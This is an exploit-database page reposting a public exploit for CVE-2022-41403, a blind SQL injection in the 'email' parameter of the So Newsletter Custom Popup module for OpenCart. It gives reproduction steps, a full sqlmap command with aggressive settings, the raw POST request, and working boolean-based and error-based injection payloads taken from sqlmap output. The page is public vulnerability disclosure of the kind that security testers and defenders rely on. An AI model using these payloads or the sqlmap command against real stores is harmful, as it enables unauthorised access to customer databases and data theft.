Advertisement






OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection

CVE Category Price Severity
CVE-2022-41403 CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2022-10-17
CPE
cpe:cpe:/a:opencart:opencart:3.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100041

Below is a copy:

OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection
# Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection
# Date: 16/10/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added
# Version: v.4.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
# CVE: CVE-2022-41403


* Description :

So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. 
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter or in index for Newsletter Email
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs



Request :

===========

POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive

createdate=2022-8-28%2019:4:6&email=hi&status=0


===========

Output :

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum